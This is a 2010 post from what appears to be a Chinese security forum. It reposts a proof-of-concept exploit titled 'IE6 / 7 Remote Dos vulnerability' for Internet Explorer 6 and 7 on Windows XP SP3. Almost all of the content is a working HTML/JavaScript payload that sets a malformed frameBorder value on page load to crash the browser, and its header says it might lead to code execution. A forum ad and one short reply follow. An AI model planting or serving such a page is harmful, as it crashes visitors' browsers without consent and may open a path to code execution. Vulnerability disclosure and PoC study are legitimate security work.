首页
社区
课程
招聘
[推荐]IE6 / 7 Remote Dos vulnerability
发表于: 2010-7-28 23:53 2370

[推荐]IE6 / 7 Remote Dos vulnerability

2010-7-28 23:53
2370
# Exploit Title: IE6 / 7 Remote Dos vulnerability  

# Date: 27/07/2010  

# Author: Richard leahy  

# Version: 6 / 7  

# Tested on: Windows Xp Sp3  

#category Remote Dos, might lead to code execution.  

   

<html>  

<head>  

<script>  

   

function dos(){  

   

  var e = document.createElement('frame');  

  var prop = 'frameBorder';  

   

  e[prop] = 0123456789;  

}  

   

</script>  

</head>  

<body onload="dos()">  

</body>  

   

</html>  

           

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 62
活跃值: (60)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
可以说是最新的挂代码方式!
2010-7-28 23:54
0
游客
登录 | 注册 方可回帖
返回
//